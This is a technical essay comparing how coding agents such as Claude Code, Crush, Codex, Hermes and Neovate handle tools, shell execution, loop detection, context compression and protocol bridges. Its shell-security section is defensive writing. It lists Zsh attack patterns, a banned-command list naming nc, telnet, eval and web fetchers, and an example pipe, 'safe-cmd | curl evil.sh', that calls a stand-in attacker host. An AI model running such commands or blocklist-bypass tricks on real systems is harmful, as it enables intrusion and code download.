
How these coding agents are actually built

Under the surface, these repos cluster into a few distinct shapes: bespoke terminal runtimes, provider multiplexers, protocol bridges, and orchestration frameworks. Their tool design choices tell you which camp they belong to.


The four architecture families

Bespoke terminal kernels

Claude Code, Crush, and Codex feel like software products first. Tool schemas, permissions, terminal UX, and recovery behavior are baked into the runtime rather than bolted on through a generic orchestration layer. Crush is uniquely notable for shipping native LSP integration (diagnostics and symbol references) and Sourcegraph code search as first-class built-in tools. Codex stands out as a Rust-native binary built around a Ratatui TUI, organized as a 70+ crate Cargo workspace, with platform-specific sandboxes (Seatbelt on macOS, bubblewrap on Linux, Windows tokens).

Provider-matrix CLIs

Mux, Neovate, and Qwen Code invest heavily in model registries, provider catalogs, and config resolution. The runtime exists partly to normalize many providers into one interface.

Protocol-heavy adapters

Pochi and Kimi CLI are notable for bridge code: MCP adapters, ACP translation, vendor packages, and importers from adjacent ecosystems.

Sandbox and orchestration platforms

DeerFlow and OpenHands focus on multi-step execution environments. They care about app servers, middleware, sandboxes, and delegated work as much as about any single interactive CLI session.

Self-improving multi-platform agents

Hermes (Nous Research) is in a category of its own: persistent skill learning, multi-platform messaging gateways, RL training pipelines, and a MoA synthesis tool. Not a coding-only agent, but the most feature-rich architecture in the set.

How tool calls are represented

| Repo | Tool representation | What stands out | Editing style |
| --- | --- | --- | --- |
| Claude Code | Typed internal tool modules with schemas, metadata, UI, and permission hooks | Tools are product features, not just JSON functions. There are dedicated plan, task, worktree, slash-command, and MCP surfaces. | Bespoke file tools and patch flows under a large central runtime |
| Crush | Go implementations paired with self-describing tool docs | Feels handcrafted. The tooling layer is readable, cohesive, and consistent with the terminal product. | Custom file, shell, and LSP-oriented operations |
| Qwen Code | Declarative tools translated into provider-facing function declarations | The tool system is cleanly separated from model config, confirmation rules, and MCP discovery. | Structured edit tools plus guarded shell execution |
| Neovate Code | AI SDK-style tools with strong typing and bash guards | Its bash tool is unusually opinionated about banned commands, substitutions, and risky patterns. | CLI tools with explicit safety checks and MCP conversion |
| Pochi | Built-in tool map first, MCP tools second | Mixes direct tools, background jobs, diff application, and vendor-specific agent packages. | Search/replace and diff-centric editing with worktree workflows |
| Kimi CLI | Python tool modules and ACP conversion blocks | Notable bridge layer that converts internal diffs and tool results into ACP-friendly structures. | Terminal and edit tools shaped for protocol export |
| DeerFlow | LangGraph/LangChain tool assembly from config, MCP, and subagent sources | Tools are part of a harness. Middleware and role configuration matter as much as the tools themselves. | Sandboxed file tools plus delegated subagent execution |
| OpenHands | Legacy function-calling tools mapped into actions | The local repo still shows classic CodeAct function tooling, but it is not the full story for the newer system. | Sandbox actions such as bash execution and string-replace editing |
| Mux | Broader workspace/runtime orchestration around provider-aware agents | Less obviously tool-schema-centric in the docs I read; more focused on workspaces, execution environments, and provider routing. | Workspace-driven execution with desktop/browser product framing |
| Hermes | Python tool modules with a COMMAND_REGISTRY autodiscovery pattern | A single CommandDef list auto-derives CLI autocomplete, the Telegram menu, the Slack subcommand map, and gateway help simultaneously. MoA and Delegate tools are unique in this set. | Standard read/write/shell tools plus skill_manager, MoA synthesis, and sub-agent delegation |
| Pi Mono | TypeBox JSON schemas with AJV validation, 7 core tools | Multi-disjoint edits per call, a file mutation queue, fuzzy matching (Unicode normalization), and uniqueness validation. Extensions can register custom tools with full TypeBox schemas. | Precise text replacement (not diffs) with reverse-order application, line-ending preservation, and BOM handling |
| Codex | codex-tools crate with ToolSpec/ToolDefinition, JSON Schema via schemars, 20+ built-in tools | Rust-native tool definitions derive JSON Schema automatically. The tool registry is tightly integrated with the Ratatui TUI and permission model. | Structured tool calls with Rust type safety, integrated with shell and file operations |

The big divider is whether tools are treated as a neutral transport format or as a first-class product surface. Claude Code and Crush are on the product side of that line.

Shell and CLI execution

| Repo | Shell model | Background support | Guardrails |
| --- | --- | --- | --- |
| Claude Code | Rich shell and process tooling inside the main runtime | Yes | Permission modes, explicit tool policies, and runtime-level orchestration |
| Neovate Code | Bash tool with timeout, truncation, and risk checks | Some long-running cases | Banned commands, command-substitution checks, and high-risk detection |
| Qwen Code | Shell tool with command parsing and read-only detection | Yes | Permission decisions and shell classification before execution |
| Pochi | Command execution plus explicit background-job support | Yes | Separate tools for foreground commands and long-running jobs |
| Kimi CLI | Fresh shell-oriented tool calls plus shell-mode UX | Yes, via task management | Task-oriented UX and protocol-aware terminal capability handling |
| Crush | Native Go shell service integrated with permissions and TUI | Yes | Product-level permissions, service boundaries, and custom runtime control |
| DeerFlow | Sandboxed bash-like operations inside a harness | Yes | Middleware plus sandbox abstractions keep execution constrained |
| OpenHands | Sandbox bash actions exposed to the agent | Yes | Isolation comes from the runtime sandbox more than from the tool schema itself |
| Mux | Workspace and runtime execution, often closer to a persistent environment | Yes | Provider routing is central; shell policy is less front-and-center in the docs than in Neovate or Claude |
| Hermes | Shell tool plus 6 remote execution backends: local, Docker, SSH, Daytona, Modal, Singularity | Yes | Tirith binary verifies execution-environment authenticity via SHA-256 + cosign provenance before runs |
| Pi Mono | Pluggable BashOperations interface with streaming output and detached process trees | Yes (via detached processes + killProcessTree) | Extension-based (BashSpawnHook), a commandPrefix option, no built-in bans — security is the user's responsibility (container or extension) |
| Codex | zsh-fork backend (macOS), Unix escalation (others), execpolicy rule engine | Yes | Platform-specific sandboxes: Seatbelt (macOS), bubblewrap (Linux), Windows tokens; execpolicy rule engine for fine-grained command authorization |

Shell security depth comparison

The agents vary enormously in how much engineering goes into preventing the bash tool from doing damage. Here are four representative points on that spectrum, from most defensive to most permissive:

Claude Code — Tree-sitter AST analysis and Zsh attack catalog

Claude Code imports tree-sitter shell grammar to parse command ASTs before execution. The bashSecurity.ts file contains a catalog of Zsh-specific attack vectors:

| Attack pattern | What it does | How detected |
| --- | --- | --- |
| zmodload | Loads Zsh modules, including network, file descriptor, and cryptographic modules | Command-name prefix match |
| emulate -c | Evaluates code in a sub-shell with an emulated environment — effectively eval | Flag pattern match |
| sysopen / sysread / syswrite | Low-level file descriptor operations from the zsh/system module | Command-name match |
| =cmd (EQUALS expansion) | Resolves to the full path of cmd, bypassing binary-name blocklists | AST token shape |
| <() / >() | Zsh process substitution, creates anonymous FIFOs | AST subtree match |
| $() / backtick substitution | Classic command substitution — but caught via tree-sitter, not regex | AST node type |
| <# | PowerShell-style comment, unexpected in a bash context — flags context confusion | Token match |
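Without pulling in tree-sitter, the command-name and flag tiers of such a catalog can be sketched in a few lines. This is an illustrative reconstruction, not Claude Code's actual code: the catalog contents, function name, and shlex tokenization are all assumptions, and the real implementation matches against a full AST.

```python
# Illustrative sketch of a Zsh attack-pattern catalog check. Claude Code
# parses a real AST with tree-sitter; this covers only the command-name
# and flag tiers, and every name below is invented.
import shlex

ZSH_ATTACK_CATALOG = {
    "zmodload": "loads Zsh modules (network, file descriptors, crypto)",
    "sysopen": "low-level fd operation from zsh/system",
    "sysread": "low-level fd operation from zsh/system",
    "syswrite": "low-level fd operation from zsh/system",
}
DANGEROUS_FLAGS = {("emulate", "-c"): "evaluates code in an emulated sub-shell"}

def scan_command(command: str) -> list[str]:
    """Return findings for one command string; an empty list means clean."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return ["unbalanced quoting"]  # fail closed on parse errors
    if not tokens:
        return []
    findings = []
    name = tokens[0]
    if name in ZSH_ATTACK_CATALOG:
        findings.append(f"{name}: {ZSH_ATTACK_CATALOG[name]}")
    for (cmd, flag), why in DANGEROUS_FLAGS.items():
        if name == cmd and flag in tokens[1:]:
            findings.append(f"{cmd} {flag}: {why}")
    # =cmd expansion resolves to a full binary path, dodging name blocklists
    if any(tok.startswith("=") and len(tok) > 1 for tok in tokens):
        findings.append("=cmd expansion bypasses binary-name blocklists")
    return findings
```

The AST approach exists precisely because token-level checks like this one miss nested substitutions; the sketch only shows the catalog-lookup shape.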

Neovate Code — Quote-aware pipeline parser

Neovate's bash tool uses a character-level state machine to handle quoting correctly before any security check:

// State machine tracks: inSingleQuote, inDoubleQuote, escaping
// splitPipelineSegments() respects quoting so 'echo "a|b"' is ONE segment
// hasCommandSubstitution() tracks same states to find $() and backticks

The hard-coded banned commands include some surprises beyond the obvious: aria2c, axel, curlie, http-prompt, httpie, links, lynx, w3m, xh (all web fetchers), plus shell alternatives bash, sh, fish, zsh, and the dangerous utility trio nc, telnet, eval.
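The same state machine is easy to sketch in Python. This is an illustrative reconstruction, not Neovate's TypeScript: the function names mirror the comments above, but the details beyond the three tracked states are guessed.

```python
# Sketch of a quote-aware pipeline splitter in the spirit of Neovate's
# state machine (inSingleQuote, inDoubleQuote, escaping). Names are
# illustrative, not Neovate's actual API.
def split_pipeline_segments(command: str) -> list[str]:
    """Split on `|` only when outside quotes, so `echo "a|b"` stays whole."""
    segments, current = [], []
    in_single = in_double = escaping = False
    for ch in command:
        if escaping:
            current.append(ch)
            escaping = False
        elif ch == "\\" and not in_single:
            current.append(ch)
            escaping = True            # next character is literal
        elif ch == "'" and not in_double:
            in_single = not in_single
            current.append(ch)
        elif ch == '"' and not in_single:
            in_double = not in_double
            current.append(ch)
        elif ch == "|" and not in_single and not in_double:
            segments.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    segments.append("".join(current).strip())
    return [s for s in segments if s]

def has_command_substitution(command: str) -> bool:
    """Detect $() and backticks outside single quotes (same state tracking).
    Double quotes do not block substitution in a real shell, so only
    single-quote state suppresses a match."""
    in_single = False
    for i, ch in enumerate(command):
        if ch == "'":
            in_single = not in_single
        elif not in_single and (ch == "`" or command[i:i + 2] == "$("):
            return True
    return False
```

Running the banned-command check per segment, after this split, is what stops `safe-cmd | curl evil.sh` from slipping through as a single "safe" command.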

Hermes — Binary provenance verification

Hermes takes a different approach: rather than blocking specific commands, it verifies the execution environment. The Tirith security binary is downloaded from GitHub and its SHA-256 hash is verified against a known-good value. On supported platforms, cosign provenance attestation is also checked. This is supply-chain security, not just command blocking.
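The hash-pinning half of that check is simple to sketch. The cosign attestation step is omitted here, and the function shape is illustrative, not Hermes's actual API:

```python
# Sketch of hash-pinned binary verification in the style described for
# Tirith. The caller supplies the pinned known-good digest.
import hashlib

def verify_binary(path: str, expected_sha256: str) -> bool:
    """Stream the file and compare its SHA-256 digest to a pinned value."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):  # read in 64 KiB chunks
            digest.update(chunk)
    return digest.hexdigest() == expected_sha256
```

The point of the design is that the agent refuses to execute anything until this returns True, shifting trust from command filtering to supply-chain integrity.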

Crush — Product-level permission gates

Crush integrates a permission system directly into its TUI. Before executing dangerous operations, the user sees a permission prompt. This is a UX-level defense rather than a parse-level one — appropriate for an interactive tool where the user is present.

Loop and stuck detection

What happens when an agent is spinning its wheels? Most agents don't have explicit detection. Crush and Hermes do (DeerFlow's loop-detection middleware, covered under retry strategies below, takes a third approach):

Crush — SHA-256 tool signature hashing

For each step, Crush computes a signature by SHA-256 hashing the concatenation of tool_name + "\x00" + tool_input + "\x00" + tool_output for every tool call in that step. It slides a window over the last 10 steps. If any signature appears more than 5 times in that window, the agent is halted as stuck.

This is robust: calling the same tool with different arguments gets a different hash. Calling it with the same arguments but getting different output (e.g., due to a flaky command) also gets a different hash. Only genuine repetition triggers the halt.

// internal/agent/loop_detection.go
windowSize = 10  // last N steps to check
maxRepeats  = 5  // halt once any signature repeats more than this many times
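The detector is easy to reimplement from that description. Crush's real code is Go; this Python sketch follows the prose, and everything beyond the signature format and the two constants is assumed.

```python
# Python reimplementation sketch of the loop detector described above.
import hashlib
from collections import Counter

WINDOW_SIZE = 10  # last N steps to check
MAX_REPEATS = 5   # halt once any signature repeats more than this

def signatures(step):
    """One SHA-256 per tool call: name \\x00 input \\x00 output."""
    return [
        hashlib.sha256(
            f"{call['name']}\x00{call['input']}\x00{call['output']}".encode()
        ).hexdigest()
        for call in step
    ]

def is_stuck(steps) -> bool:
    """steps is a list of steps, each a list of tool-call dicts."""
    window = steps[-WINDOW_SIZE:]
    counts = Counter(sig for step in window for sig in signatures(step))
    return any(n > MAX_REPEATS for n in counts.values())
```

Because the hash covers name, input, and output together, only exact repetition counts: a flaky command that produces different output each run never trips the detector.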

Hermes — Per-session trajectory tracking

Hermes exports full trajectory data in <tool_call> XML tags wrapping JSON — a format that matches Nous Research's Hermes model fine-tuning data format. This trajectory data can be used post-hoc for RL training to reward or penalize specific action sequences.

The context compressor's iterative re-compression also detects when the same summary is being generated repeatedly (diminishing new information), allowing the RL training signal to identify "summary convergence" as a proxy for being stuck on a task.

πŸ’‘

Why most agents don't have this

Most agents rely on the model to notice it is repeating itself. Crush's explicit detection is a sign of production experience: models sometimes don't notice, and users definitely don't want to watch 50 identical tool calls scroll by.

Context compression strategies

When context windows fill up, agents need to compress history. The strategies here range from no-op to sophisticated:

| Agent | Strategy | Key detail |
| --- | --- | --- |
| Hermes | 5-step algorithmic compression with structured summaries | Prune old tool results → protect head → protect tail by token budget → LLM-summarize the middle → iteratively update on re-compression. Summaries include Goal, Progress, Decisions, Files, and Next Steps sections. Summary ratio: 20% of compressed content, max 12K tokens. |
| Neovate Code | Trigger-ratio compaction + separate pruning phase | Compaction fires at a configurable triggerRatio (% of the model context limit). Separate pruning config with protectedTools, protectTurns, minimumPrune. autoContinue mode resumes automatically after compaction. |
| Claude Code | Rolling context with auto-compaction | Built into the runtime; integrates with plan mode and memory retrieval. Less configurable than Neovate but tightly integrated with the product experience. |
| Qwen Code | Config-driven rolling/summarization | Configurable via user settings. Less implementation detail is visible in the public snapshot than for Neovate or Hermes. |
| DeerFlow | LangGraph checkpointer-based state management | State is checkpointed per run in the LangGraph store. Thread resumption reloads only what the graph needs, rather than replaying the full conversation history. |
| Others | Provider-default truncation | Most CLIs rely on the model provider to handle context limits, either by truncating the oldest messages or raising a context-length error. |
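As a concrete illustration of the head/tail-protection pattern shared by the more sophisticated entries, here is a minimal sketch with a stubbed summarizer. The budgets, message shape, and word-count "tokenizer" are all placeholder assumptions, not any agent's real code.

```python
# Minimal sketch of head/tail-protected compression: keep the oldest and
# newest messages verbatim, summarize the middle. All values illustrative.
def compress_history(messages, head_keep=2, tail_token_budget=2000,
                     summarize=lambda ms: f"[summary of {len(ms)} messages]"):
    """Keep the first head_keep messages and a token-budgeted tail verbatim;
    replace the middle span with a single summary message."""
    def tokens(msg):
        return len(msg["content"].split())  # crude stand-in for a tokenizer

    tail, budget = [], tail_token_budget
    for msg in reversed(messages[head_keep:]):  # walk backwards from the end
        if budget < tokens(msg):
            break
        budget -= tokens(msg)
        tail.append(msg)
    tail.reverse()

    middle = messages[head_keep:len(messages) - len(tail)]
    if not middle:
        return messages  # everything fit; nothing to compress
    summary = {"role": "system", "content": summarize(middle)}
    return messages[:head_keep] + [summary] + tail
```

Iterative re-compression, as Hermes does it, would pass the previous summary back into `summarize` so the middle section updates instead of nesting summaries inside summaries.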

Agent state machines and retry strategies

How agents handle the "what to do next" decision after each turn reveals their architectural maturity. Four agents in this set make that decision explicit:

Claude Code — 10 terminal states, 8 continue reasons

The query engine (src/query/transitions.ts) is a named state machine with explicit exit reasons. Terminal exits: 'completed', 'blocking_limit', 'image_error', 'model_error', 'aborted_streaming', 'aborted_tools', 'prompt_too_long', 'stop_hook_prevented', 'hook_stopped', 'max_turns'.

Continue reasons (agent loops back): 'tool_use', 'reactive_compact_retry', 'max_output_tokens_recovery', 'max_output_tokens_escalate', 'collapse_drain_retry', 'stop_hook_blocking', 'token_budget_continuation', 'queued_command'. Each is a distinct named transition, not a generic "keep going" flag. Token budget fires at COMPLETION_THRESHOLD = 0.9; if per-check delta falls below DIMINISHING_THRESHOLD = 500 tokens three times, the agent is considered complete.
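The diminishing-returns check reduces to a small amount of state. This sketch uses the two constants from the prose; the class shape, the three-strikes constant name, and the "consecutive" interpretation are assumptions.

```python
# Sketch of the token-budget continuation check described above.
COMPLETION_THRESHOLD = 0.9    # start checking at 90% of the budget
DIMINISHING_THRESHOLD = 500   # minimum useful new tokens per check
REQUIRED_LOW_DELTAS = 3       # low-delta checks before declaring completion

class TokenBudgetTracker:
    def __init__(self, budget: int):
        self.budget = budget
        self.last_total = 0
        self.low_deltas = 0

    def should_stop(self, total_tokens: int) -> bool:
        """Call once per check with the cumulative token count."""
        delta = total_tokens - self.last_total
        self.last_total = total_tokens
        if total_tokens < COMPLETION_THRESHOLD * self.budget:
            return False  # plenty of budget left; no check needed
        if delta < DIMINISHING_THRESHOLD:
            self.low_deltas += 1
        else:
            self.low_deltas = 0  # real progress resets the streak
        return self.low_deltas >= REQUIRED_LOW_DELTAS
```

The idea is to stop not when the budget is exhausted but when spending more of it stops producing new output.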

OpenHands — Temperature bumping on dead LLM responses

OpenHands' retry mixin (openhands/llm/retry_mixin.py) uses the tenacity library with a documented intentional quirk: on LLMNoResponseError when temperature is 0, it automatically sets temperature = 1.0 on the next attempt.

The reasoning: a fully deterministic model (temp=0) that returns nothing is stuck in a degenerate fixed point and will return nothing again. Adding randomness breaks the loop. This is one of the more thoughtful LLM retry patterns in the set — it adapts the request rather than just retrying identically.
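The pattern is easy to reproduce without the tenacity dependency. This hand-rolled sketch keeps only the temperature-bump quirk; LLMNoResponseError here is a stand-in class, not the OpenHands import.

```python
# Hand-rolled sketch of the retry-with-temperature-bump pattern.
class LLMNoResponseError(Exception):
    """Raised when the model returns an empty/dead response."""

def call_with_retry(llm_call, params, max_attempts=3):
    """Retry empty responses; if temperature was 0, bump it to 1.0 first,
    since a deterministic model that returned nothing will do so again."""
    for attempt in range(max_attempts):
        try:
            return llm_call(**params)
        except LLMNoResponseError:
            if attempt == max_attempts - 1:
                raise
            if params.get("temperature", 0) == 0:
                params = {**params, "temperature": 1.0}  # break the fixed point
```

Note that the bump happens once and sticks for subsequent attempts, which matches the stated goal: change the request, don't just repeat it.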

DeerFlow — 200-line buckets to prevent false loop detection

DeerFlow's LoopDetectionMiddleware hashes tool name + input + output to detect repetition. But for read_file, line numbers are bucketed into 200-line groups before hashing — because paginated file reads of the same file look identical to the naive algorithm, but are legitimate progress.

On warn (3 repeats): inject HumanMessage("you are repeating yourself — wrap up"). On hard limit (5 repeats): strip tool_calls entirely from the response, forcing a plain-text answer and ending the loop definitively.
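A bucketed repetition key can be sketched as follows. The read_file input key names and the JSON canonicalization are assumptions for illustration, not DeerFlow's actual middleware code.

```python
# Sketch of a repetition key that coarsens read_file line offsets, so
# near-identical re-reads of one region hash alike while reads of
# different regions of the same file do not.
import hashlib
import json

BUCKET = 200  # line numbers collapse into 200-line groups

def repetition_key(tool_name: str, tool_input: dict, output: str) -> str:
    """SHA-256 over name + input + output, with bucketed line offsets."""
    tool_input = dict(tool_input)  # avoid mutating the caller's dict
    if tool_name == "read_file":
        for key in ("start_line", "end_line"):
            if key in tool_input:
                tool_input[key] //= BUCKET
    payload = json.dumps([tool_name, tool_input, output], sort_keys=True)
    return hashlib.sha256(payload.encode()).hexdigest()
```

The middleware then counts occurrences of each key exactly as in the Crush scheme, but with this domain-aware preprocessing step in front.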

Qwen Code — Truncation recovery with Levenshtein validation

When the model's response is truncated mid-tool-call, Qwen Code (coreToolScheduler.ts) injects TRUNCATION_PARAM_GUIDANCE ("your previous response was truncated due to max_tokens…") to ask the model to retry, and returns TRUNCATION_EDIT_REJECTION ("tool call has been rejected to prevent writing truncated content") for any edit tool where the output is incomplete.

The scheduler imports both diff and fast-levenshtein to verify that proposed file edits are not corrupted: if a diff-patch looks syntactically valid but the Levenshtein distance between the "before" and "after" is implausible, the edit is rejected. modifiable-tool.ts additionally lets tool calls be edited in-flight by the user before execution.
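A distance-based plausibility gate might look like the following. The acceptance rule is invented for illustration (the real scheduler's threshold logic is not documented here), and this O(n·m) Levenshtein stands in for the fast-levenshtein package.

```python
# Sketch of a distance-based edit sanity gate: reject file edits whose
# whole-file change is far larger than the change the model claimed.
def levenshtein(a: str, b: str) -> int:
    """Classic dynamic-programming edit distance."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        curr = [i]
        for j, cb in enumerate(b, 1):
            curr.append(min(prev[j] + 1,                 # deletion
                            curr[j - 1] + 1,             # insertion
                            prev[j - 1] + (ca != cb)))   # substitution
        prev = curr
    return prev[-1]

def edit_is_plausible(before: str, after: str,
                      old_text: str, new_text: str) -> bool:
    """A clean single replacement changes the file by at most the distance
    between old_text and new_text; anything larger suggests the edit was
    corrupted (e.g. the file body was truncated mid-write)."""
    return levenshtein(before, after) <= levenshtein(old_text, new_text)
```

A production version would need slack for multiple occurrences of old_text; the point is the shape of the check, not the exact threshold.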

Hooks and lifecycle events

Tool hooks — code that runs before and after tool calls — let external systems observe or modify agent behavior without patching the core. Three agents in this set have them as first-class concepts:

Kimi CLI — Three-event hooks system

The hooks/events.py module defines three events per tool call:

  • pre_tool_use(tool_name, input) — runs before the tool; can modify or block the call
  • post_tool_use(tool_name, input, result) — runs after success; can observe output
  • post_tool_use_failure(tool_name, input, error) — runs on failure; allows custom error handling

This hooks API enables telemetry, authorization checks, result caching, and test mocking without touching tool implementation code.
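A minimal dispatcher for those three events might look like this. The registry class and method names are invented; only the event semantics come from the docs above.

```python
# Minimal three-event hook dispatcher sketch.
class HookRegistry:
    def __init__(self):
        self._hooks = {"pre_tool_use": [], "post_tool_use": [],
                       "post_tool_use_failure": []}

    def on(self, event: str, fn):
        self._hooks[event].append(fn)

    def run_tool(self, tool_name: str, tool_input: dict, tool_fn):
        for hook in self._hooks["pre_tool_use"]:
            tool_input = hook(tool_name, tool_input)  # hooks may rewrite input
        try:
            result = tool_fn(tool_input)
        except Exception as err:
            for hook in self._hooks["post_tool_use_failure"]:
                hook(tool_name, tool_input, err)  # custom error handling
            raise
        for hook in self._hooks["post_tool_use"]:
            hook(tool_name, tool_input, result)  # observe successful output
        return result
```

Blocking a call would be modeled by having a pre_tool_use hook raise; telemetry, caching, and test mocking hang off the two post hooks the same way.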

Hermes — Security scan hooks on skill saves

Hermes does not have a general hooks API, but it has a specific security-scan hook on the skill learning path: before any SKILL.md file is written to ~/.hermes/skills/, the content is scanned for prompt injection patterns and invisible Unicode. Similarly, MEMORY.md and USER.md are scanned on every load.

This is a security-specific hooks pattern rather than a general lifecycle API.

Pi Mono — 20+ lifecycle events via extensions

Pi's extension system exposes 20+ events via the ExtensionAPI: agent_start, agent_end, tool_call, tool_result, beforeToolCall, afterToolCall, message_start/end, turn_start/end, session_start/compact/tree, model_select, before_provider_request, and more.

Extensions can block, modify, or augment any tool execution. Event handlers return promises that are awaited in order, enabling synchronous interception. Custom tools, providers, renderers, widgets, and status lines are all registered through the same event-driven API.

MCP, ACP, and bridge strategy

MCP leaders

Claude Code, Qwen Code, Neovate, Pochi, and DeerFlow all show serious MCP handling. The difference is emphasis:

  • Claude treats MCP as part of a larger integrated runtime.
  • Qwen and Neovate handle discovery, connection state, and health more explicitly.
  • Pochi blends MCP with vendor and agent ecosystem imports.
  • DeerFlow folds MCP into a composable extensions system.

ACP specialist

Kimi CLI is the clearest protocol-bridge project in this set. Its ACP conversion layer is not decorative; it maps internal edits, terminal calls, and result blocks into transportable protocol content. The docs even call out current feature gaps such as missing session/set_mode and session/set_model.

Bidirectional MCP

Codex supports MCP in both directions: as a client via the codex-mcp crate (connecting to external MCP servers) and as a server via codex-mcp-server, exposed through the codex mcp-server CLI command. This lets Codex both consume external MCP tools and expose its own tools to other MCP clients.

⚠️

OpenHands is a qualified case

The local repo contains architecture, runtime, sandbox, and legacy tool/action patterns, but the project itself says the main V1 agentic core moved elsewhere. Any MCP or tool comparison for OpenHands should be read as a snapshot of the local repo, not the whole current product story.

Error handling and recovery patterns

Claude Code

Recovery is systemic: permissions, retries, tool-specific controls, command systems, and a dedicated runtime all participate. It feels designed around failure as a normal operating condition.

Neovate Code

Strong at pre-emptive failure avoidance. Its shell code tries hard to stop dangerous or malformed commands before they ever run, and its MCP manager tracks retries and connection state explicitly.

Qwen Code

Particularly good at configuration and state management. Model resolution has source precedence, runtime snapshots, and rollback-ish handling that makes the system easier to reason about.

DeerFlow

Uses middleware to absorb failure modes: clarification interrupts, dangling tool-call handling, summarization, and subagent limits. That is framework-style robustness rather than CLI-style robustness.

Crush

Calm, explicit Go-style error boundaries. Provider metadata caching and service organization make failure paths easier to trace than in sprawling dynamic runtimes.

Kimi CLI

More honest than flashy: the ACP docs openly acknowledge current limitations, which is often a sign of a healthy protocol mindset rather than a polished marketing wrapper.

Pi Mono

Error handling is multi-layered: tool-level errors return isError: true to the LLM for self-retry, abort signals trigger graceful cleanup (temp files closed, partial results returned), compaction failures auto-retry, and extension errors are caught and emitted via emitError() without crashing the agent. The file mutation queue prevents concurrent write races entirely.

Codex

Strict clippy configuration denies unwrap_used and expect_used across the workspace, forcing explicit error handling at compile time. Runtime recovery includes a 300s idle timeout and up to 5 stream retries before giving up.

What architecture tells you about product intent

The repos that feel the strongest are the ones whose architecture matches their promise. Claude Code promises an elite terminal coding partner, and the repo looks like a full custom runtime. Crush promises a serious CLI product, and the repo looks handcrafted for that. Qwen promises a configurable multi-provider CLI, and its model-resolution machinery backs that up. Hermes promises a self-improving multi-platform agent, and its skills system, RL infrastructure, and gateway adapters all back that up. Pi Mono promises a minimalist extensible kernel, and its 438-file codebase with differential TUI, tree sessions, and Pi Packages delivers exactly that.

The weaker-feeling designs are not necessarily bad; they are often just trying to do a broader or less opinionated job. Pochi is ambitious and eclectic. DeerFlow is powerful but framework-heavy. OpenHands is split across repo boundaries. Kimi prioritizes bridge fidelity over terminal theatrics. Those are different goals, and the code reflects them.